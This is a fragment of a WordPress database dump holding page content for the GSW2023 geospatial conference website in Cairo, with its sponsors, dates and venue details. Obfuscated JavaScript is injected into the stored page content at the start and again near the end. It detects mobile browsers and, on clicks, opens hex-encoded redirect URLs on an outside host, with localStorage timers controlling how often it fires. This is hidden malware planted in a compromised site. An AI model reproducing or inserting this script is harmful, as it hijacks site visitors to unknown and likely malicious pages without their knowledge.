)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:49:19','2023-04-02 01:49:19','',3066,'https://gsw2023.com/?p=3991',0,'revision','',0),
(3992,1,'2023-04-02 01:50:56','2023-04-02 01:50:56','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400250324{margin-top: 105px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400128548{margin-top: 85px !important;}\"]&nbsp;</p>\n<p><img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 